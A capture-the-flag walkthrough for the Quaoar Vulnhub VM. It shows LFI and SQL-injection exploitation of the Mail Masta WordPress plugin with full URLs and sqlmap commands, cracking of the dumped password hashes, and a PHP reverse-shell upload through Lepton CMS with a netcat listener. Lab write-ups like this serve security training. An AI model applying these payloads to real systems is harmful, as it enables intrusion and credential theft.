Quaoar: Revisited

I was sitting in the Vulnhub channel over the past week when someone brought up an issue with solving this VM by a different method than the one I used previously. They were having trouble getting an exploit to work for a remote shell. Here is the additional route I used to help them get access to the system without guessing any credentials, ending in a shell through Lepton. I found this to be the harder way to get a shell.

  1. Let's rescan the WordPress installation, this time enumerating vulnerable plugins.
    1. Command: wpscan --url http://172.16.2.17/wordpress --enumerate vp
  2. Looking through the plugins, it lists Mail Masta as vulnerable to LFI (Local File Inclusion), which might let us read files on the system, and to quite a few SQL injections.
  3. We will now check searchsploit for proof-of-concept code or instructions on exploiting these vulnerabilities.
    1. Command: searchsploit "Mail Masta"
  4. Checking 40290.txt, we see that we can browse to count_of_send.php and make it include any local file the web server account (the user PHP runs as, typically www-data) can read.
    1. First we check /etc/passwd, where user accounts are stored. Then we move on to /etc/shadow, as that would be the quickest win: dumping account password hashes.
    2. Site: http://172.16.2.17/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
    3. Requesting /etc/shadow the same way returns nothing, which means the web server account has no read access to it (on a default install the file is readable only by root and the shadow group).
    4. Site: http://172.16.2.17/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/shadow
  5. Reading 41438.txt shows a few options, but the best is the first one, as it is unauthenticated.
    1. https://www.exploit-db.com/exploits/41438/
      Mail-Masta SQL Injection 
      
      Page: ./wp-content/plugins/mail-masta/inc/lists/csvexport.php (Unauthenticated) 
      
      GET Parameter: list_id 
      
      http://my_wp_app/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php
  6. This request sets list_id to 0 OR 1=1, so the WHERE clause is always true and every row matches: the classic tautology test for SQL injection. We will browse to the page and capture the GET request that is sent to the server to feed into SQLMap.
    1. Browse to the following site with Wireshark open (Burp or the browser's developer tools work just as well). Copy the full raw HTTP GET request, headers included, into a text file; that is the format sqlmap's -r option expects.
    2. Site: http://172.16.2.17/wordpress/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php
    3. Additional Resource: https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)
  7. However, in the previous step we do not receive any text or the file download you would expect. The pl parameter is the path to wp-load.php that csvexport.php includes to bootstrap WordPress and its database connection; the exploit's example assumes a document root of /var/www/html, but on this VM WordPress lives under /var/www, so we correct the path. (If the real path is not obvious, the LFI from step 4 can be used to read the web server's configuration and find it.)
    1. Site: http://172.16.2.17/wordpress/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/wordpress/wp-load.php
    2. This prompts us to download a .csv file as expected.
  8. Since the website runs WordPress, the backend database is MySQL (or MariaDB), and we tell sqlmap this so it does not waste time fingerprinting other engines.
    1. Command: sqlmap -r request --dbms=mysql -p list_id
    2. -r loads the raw HTTP request from the file.
    3. --dbms tells sqlmap which database engine to target.
    4. -p names the parameter to test for injection.
  9. We will run a few more commands to extract information from the databases. With luck we will find usernames and credentials, as WordPress stores both in MySQL.
    1. Command: sqlmap -r request --dbms=mysql -p list_id --dbs
    2. Command: sqlmap -r request --dbms=mysql -p list_id --tables -D wordpress
    3. This shows a standard WordPress schema, so we dump wp_users, the table where WordPress keeps its accounts and password hashes.
    4. Command: sqlmap -r request -p list_id --dbms=mysql --dump -D wordpress -T wp_users
  10. We now have the admin and wpuser hashes for the WordPress installation, but we will come back to them, as there are still some potentially interesting databases to look through.
    1. Command: sqlmap -r request -p list_id --dbms=mysql --tables -D test
    2. The output shows that the test database has no tables; sqlmap fell back to checking it against its list of common table names, but nothing was found.
    3. Command: sqlmap -r request -p list_id --dbms=mysql --tables -D Lepton
    4. Command: sqlmap -r request -p list_id --dbms=mysql --dump -D Lepton -T lep_users
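To make concrete what sqlmap is exploiting in steps 6 to 10, here is an added example (not from the original post and not the plugin's own code) that reproduces the pattern behind the advisory in an in-memory SQLite database: the list_id value is spliced into the WHERE clause, so a tautology returns every row and a UNION pulls rows out of wp_users, the table dumped in step 9. SQLite stands in for MySQL here. The table layout, row contents and query text are constructed assumptions; only the two wp_users hashes are the page's own.

```python
import sqlite3

# Constructed sample data: a stand-in for the plugin's list table and a
# wp_users table seeded with the two hashes dumped on the page (IDs assumed).
LISTS = [
    (1, "newsletter", "alice@example.com"),
    (2, "promo", "bob@example.com"),
    (3, "internal", "carol@example.com"),
]
WP_USERS = [
    (1, "admin", "$P$BAgwFlu99OZUliqTgTIrUmBbtIjRMul"),
    (2, "wpuser", "$P$BdcZZVb0ssMccLUlECFCtUihocqQ0S."),
]


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE masta_list (id INTEGER, name TEXT, email TEXT)")
    con.execute("CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT)")
    con.executemany("INSERT INTO masta_list VALUES (?, ?, ?)", LISTS)
    con.executemany("INSERT INTO wp_users VALUES (?, ?, ?)", WP_USERS)
    return con


def export_vulnerable(list_id: str) -> list:
    """The advisory's bug class: the GET parameter becomes part of the SQL text.
    (Assumed pattern; the plugin's real query is not reproduced here.)"""
    sql = f"SELECT id, name, email FROM masta_list WHERE id = {list_id}"
    return make_db().execute(sql).fetchall()


def export_fixed(list_id: str) -> list:
    """Same export with the id validated and bound as a parameter."""
    try:
        ident = int(list_id)
    except ValueError:
        return []  # reject anything that is not an integer id
    sql = "SELECT id, name, email FROM masta_list WHERE id = ?"
    return make_db().execute(sql, (ident,)).fetchall()


def leak_wp_users() -> list:
    """What sqlmap automates in step 9: a UNION with a matching column count
    turns the list export into a dump of a different table."""
    return export_vulnerable("0 UNION ALL SELECT ID, user_login, user_pass FROM wp_users")


if __name__ == "__main__":
    print("list_id=1           ->", export_vulnerable("1"))
    print("list_id=0 OR 1=1    ->", export_vulnerable("0 OR 1=1"))
    print("UNION into wp_users ->", leak_wp_users())
    print("fixed, 0 OR 1=1     ->", export_fixed("0 OR 1=1"))
```

The fixed version rejects the tautology outright because the id is converted to an integer before it ever reaches the query; binding alone would also defeat the injection, since a bound value is never parsed as SQL, but validating the type first keeps the error path explicit.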
  11. Now that we have a few hashes to crack, we run Hash-Identifier to see which type each one is. The Lepton hash is an unsalted raw MD5 digest (32 hex characters). The WordPress hashes are not plain MD5: the $P$ prefix marks phpass portable hashes, which are salted and iterated MD5 (8192 rounds for WordPress's default $P$B setting), so each set has to be attacked in its own format.
    1. Lepton hash (admin): 5f4dcc3b5aa765d61d8327deb882cf99
    2. WordPress (admin): $P$BAgwFlu99OZUliqTgTIrUmBbtIjRMul
    3. WordPress (wpuser): $P$BdcZZVb0ssMccLUlECFCtUihocqQ0S.
  12. Ran John against the hashes to recover the passwords from the wp_users and lep_users tables. The Lepton file needs the format spelled out; John recognises the $P$ hashes as its phpass format on its own.
    1. Command (lep_users): john --wordlist=/rockyou.txt --format=Raw-MD5 --pot=Lepton.pot Lepton

      1. Username: admin
      2. Password: password
    2. Command (wp_users): john --wordlist=/rockyou.txt wp_user

      1. Username: admin
      2. Password: admin
      3. You likely do not need to use the --pot= argument; I used it on mine as John is not working correctly.
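As an added example for steps 11 and 12 (not part of the original post), the following Python identifies the two hash formats the page ran into and verifies John's results directly, by re-implementing phpass's portable $P$ scheme, the salted and iterated MD5 that WordPress uses by default. The hash strings are the page's own; the identification and verification code is mine, and the only assumption is that the dumped strings were transcribed exactly.

```python
import hashlib
import re

# phpass' own 64-character alphabet (not the RFC 4648 one).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Hashes as dumped on the page from lep_users and wp_users.
LEPTON_ADMIN = "5f4dcc3b5aa765d61d8327deb882cf99"
WP_ADMIN = "$P$BAgwFlu99OZUliqTgTIrUmBbtIjRMul"
WP_WPUSER = "$P$BdcZZVb0ssMccLUlECFCtUihocqQ0S."


def identify(h: str) -> str:
    """Rough format identification, the job hash-identifier did on the page."""
    if re.fullmatch(r"[0-9a-f]{32}", h):
        return "raw-md5"   # unsalted: equal passwords give equal hashes
    if re.fullmatch(r"\$[PH]\$[./0-9A-Za-z]{31}", h):
        return "phpass"    # portable phpass: salted, iterated MD5
    return "unknown"


def phpass_params(setting: str) -> tuple:
    """Return (iteration count, salt) encoded in a $P$/$H$ hash."""
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("bad phpass iteration count")
    return 1 << count_log2, setting[4:12]


def _encode64(raw: bytes, count: int) -> str:
    """phpass' base64 variant: 3 bytes -> 4 chars, least significant bits first."""
    out = []
    i = 0
    while i < count:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_crypt(password: str, setting: str) -> str:
    """Re-implementation of phpass crypt_private(): md5(salt+pw), then
    count rounds of md5(previous+pw), encoded after the 12-char setting."""
    count, salt = phpass_params(setting)
    pw = password.encode()
    h = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(count):
        h = hashlib.md5(h + pw).digest()
    return setting[:12] + _encode64(h, 16)


def check(password: str, stored: str) -> bool:
    """Does the candidate password produce the stored hash?"""
    kind = identify(stored)
    if kind == "raw-md5":
        return hashlib.md5(password.encode()).hexdigest() == stored
    if kind == "phpass":
        return phpass_crypt(password, stored) == stored
    raise ValueError(f"unsupported hash: {stored}")


def verify_cracked(cracked: dict) -> dict:
    """Confirm John's output: {hash: candidate} -> {hash: matched?}."""
    return {h: check(pw, h) for h, pw in cracked.items()}


if __name__ == "__main__":
    found = {LEPTON_ADMIN: "password", WP_ADMIN: "admin"}
    for h, ok in verify_cracked(found).items():
        print(identify(h), h, "OK" if ok else "mismatch")
```

The difference between the two formats is visible in the code: the Lepton check is a single md5() call, so a wordlist attack costs one hash per candidate, while each phpass candidate costs 8193 MD5 calls and has to be redone per salt. That is why the raw MD5 of "password" is the easier target.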
  13. Now that we have credentials, we could log into WordPress and exploit it from there, but let's see whether Lepton gets us a shell. A few Google searches show it is a content management system for websites. Browsing to /upload, we receive the following page:

    1. Unfortunately, most of this page pulls its content from http://192.168.0.190, evidently the address the Lepton install was configured with, so we cannot reach the referenced /admins page.
    2. We will need a way around this: redirect that address (192.168.0.190) back to 172.16.2.17 and see whether the page loads. On Linux this is easy with iptables and NAT.
    3. Command: iptables -t nat -A OUTPUT -p all -d 192.168.0.190 -j DNAT --to-destination 172.16.2.17
    4. The rule sits in the nat table's OUTPUT chain, so it rewrites packets generated on our own box; it needs root, and it is worth deleting (same rule with -D in place of -A) once we are done. With it in place, we can browse to /upload and actually view content.
  14. We will browse to http://172.16.2.17/upload/admins to get the login prompt. Note: the path http://172.16.2.17/admins does not load, and it took me a few tries experimenting with the URL.
  15. Once logged into Lepton, we look around at the options available to us and discover quite a few, from uploading files to JavaScript.
    1. We will first go to Settings > Server Settings > Show Advanced Options
    2. Tick the option to enable world-writable file permissions and add php to the list of allowed upload extensions.
  16. Now upload a copy of the standard php-reverse-shell.php from /usr/share/webshells/php on Kali, after editing its $ip and $port variables to point at our listener.
  17. Browse to http://172.16.2.17/upload/media/php-reverse-shell.php while a netcat listener is open on the port set in the shell.
    1. Command: nc -lvnp 443
  18. We receive a shell! From here we can go back to the privilege escalation found at https://natesec.com/quaoar/.